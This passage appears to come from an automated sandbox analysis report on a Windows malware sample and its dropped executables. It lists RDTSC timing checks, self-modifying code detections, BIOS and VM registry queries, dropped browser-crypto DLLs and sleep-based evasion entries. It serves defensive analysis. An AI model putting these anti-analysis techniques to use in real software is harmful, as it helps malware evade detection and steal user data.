                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 110C594 second address: 110C5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 110C87F second address: 110C89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBBA93ED2A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 110C89C second address: 110C8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 110C8A0 second address: 110C8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FBE1D second address: 10FBE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDC67 second address: 10FDC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDC6B second address: 10FDC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100011 second address: 1100015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100015 second address: 110001B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1101012 second address: 1101018 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11061A5 second address: 11061BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FBBA8502AB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FBBA8502AB6h 0x00000016 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A0191 second address: 10A0195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A0195 second address: 10A01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC1h 0x0000000d rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1113523 second address: 111354A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA93ED298h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FBBA93ED2A0h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 111354A second address: 111354E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 111354E second address: 1113554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 111361B second address: 1113629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11191D5 second address: 11191DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 111863C second address: 1118640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118640 second address: 111865B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBA93ED29Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11187AC second address: 11187B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 111890C second address: 111893E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBA93ED296h 0x00000008 jno 00007FBBA93ED296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jne 00007FBBA93ED296h 0x00000017 jmp 00007FBBA93ED2A9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118CE3 second address: 1118CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118CE9 second address: 1118CFF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBBA93ED29Ch 0x0000000f rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118CFF second address: 1118D23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBBA8502AC6h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FBBA8502AB6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118D23 second address: 1118D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118D27 second address: 1118D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1118ECA second address: 1118EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007FBBA93ED296h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FBBA93ED2A9h 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1119098 second address: 11190A4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11190A4 second address: 11190A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11190A9 second address: 11190B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 11190B6 second address: 11190BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A8704 second address: 10A870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F13A0 second address: 10F13AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBBA93ED296h 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F19C0 second address: 10F19C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F19C6 second address: F3EA22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D38F3h] 0x00000010 push dword ptr [ebp+122D00E9h] 0x00000016 sub dword ptr [ebp+122D341Ch], esi 0x0000001c movzx edi, ax 0x0000001f call dword ptr [ebp+122D2AC5h] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D2AD5h], esi 0x0000002c xor eax, eax 0x0000002e pushad 0x0000002f sub esi, dword ptr [ebp+122D365Bh] 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c jmp 00007FBBA93ED2A9h 0x00000041 mov dword ptr [ebp+122D388Fh], eax 0x00000047 jns 00007FBBA93ED2ABh 0x0000004d jne 00007FBBA93ED29Ch 0x00000053 mov esi, 0000003Ch 0x00000058 jne 00007FBBA93ED297h 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007FBBA93ED29Fh 0x00000067 lodsw 0x00000069 js 00007FBBA93ED29Ch 0x0000006f mov dword ptr [ebp+122D2A0Bh], edx 0x00000075 clc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b movsx esi, dx 0x0000007e and bl, FFFFFFA5h 0x00000081 popad 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 sub dword ptr [ebp+122D2AD5h], edx 0x0000008c nop 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 jnp 00007FBBA93ED296h 0x00000096 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1AF0 second address: 10F1AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1B76 second address: 10F1B80 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBBA93ED29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1B80 second address: 10F1BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 cld 0x0000000a nop 0x0000000b jne 00007FBBA8502AC0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1C3D second address: 10F1C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1C43 second address: 10F1C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1C4D second address: 10F1C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1CD8 second address: 10F1D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FBBA8502AC8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1D00 second address: 10F1D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1DBD second address: 10F1DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1DCA second address: 10F1DE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1DE1 second address: 10F1DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F1DEB second address: 10F1E46 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FBBA93ED298h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dl, 46h 0x00000029 add di, 5AC0h 0x0000002e sub edi, dword ptr [ebp+122D3807h] 0x00000034 push 00000004h 0x00000036 mov dword ptr [ebp+122D2AD0h], edi 0x0000003c jl 00007FBBA93ED29Ch 0x00000042 mov dword ptr [ebp+12475808h], ebx 0x00000048 nop 0x00000049 jp 00007FBBA93ED29Eh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F2204 second address: 10F2220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC4h 0x0000000d rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CEF870 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E9BDF5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSpecial instruction interceptor: First address: F3E9AD instructions caused by: Self-modifying code
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSpecial instruction interceptor: First address: F3EAB0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSpecial instruction interceptor: First address: 10E4459 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSpecial instruction interceptor: First address: F3E978 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeSpecial instruction interceptor: First address: 116EC52 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8EE9AD instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8EEAB0 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: A94459 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 8EE978 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: B1EC52 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: D93A0B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: F3A4F2 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: F3A906 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: D91082 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: F40CE2 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exeSpecial instruction interceptor: First address: FC2F9B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSpecial instruction interceptor: First address: 824B1A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSpecial instruction interceptor: First address: 9C2ADD instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSpecial instruction interceptor: First address: 9EA6CC instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeSpecial instruction interceptor: First address: 9D444D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSpecial instruction interceptor: First address: EE7BA9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSpecial instruction interceptor: First address: EE7CE1 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSpecial instruction interceptor: First address: 1090ABF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSpecial instruction interceptor: First address: EE53A6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeSpecial instruction interceptor: First address: 110FAE3 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSpecial instruction interceptor: First address: AFF870 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSpecial instruction interceptor: First address: CABDF5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_056B027E rdtsc 21_2_056B027E
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.3 %
                          Source: C:\Users\user\Desktop\file.exe TID: 7368Thread sleep time: -30015s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep count: 38 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep time: -76038s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7440Thread sleep time: -36000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7360Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7360Thread sleep time: -70035s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7364Thread sleep time: -70035s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep count: 32 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep time: -64032s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7356Thread sleep count: 36 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7356Thread sleep time: -72036s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep count: 37 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep time: -74037s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep count: 33 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep time: -66033s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796Thread sleep count: 65 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796Thread sleep time: -130065s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep count: 54 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772Thread sleep time: -108054s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748Thread sleep count: 53 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748Thread sleep time: -106053s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732Thread sleep count: 210 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732Thread sleep time: -6300000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep count: 47 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep time: -94047s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784Thread sleep count: 54 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784Thread sleep time: -108054s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800Thread sleep count: 49 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800Thread sleep time: -98049s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe TID: 1592Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe TID: 7640Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 8040Thread sleep time: -34017s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 8172Thread sleep time: -34017s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 239 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 104 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 85 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 188 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 180 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676Thread sleep count: 82 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 6532Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 3404Thread sleep time: -30015s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 1056Thread sleep time: -150000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 7288Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 7340Thread sleep time: -30000s >= -30000s
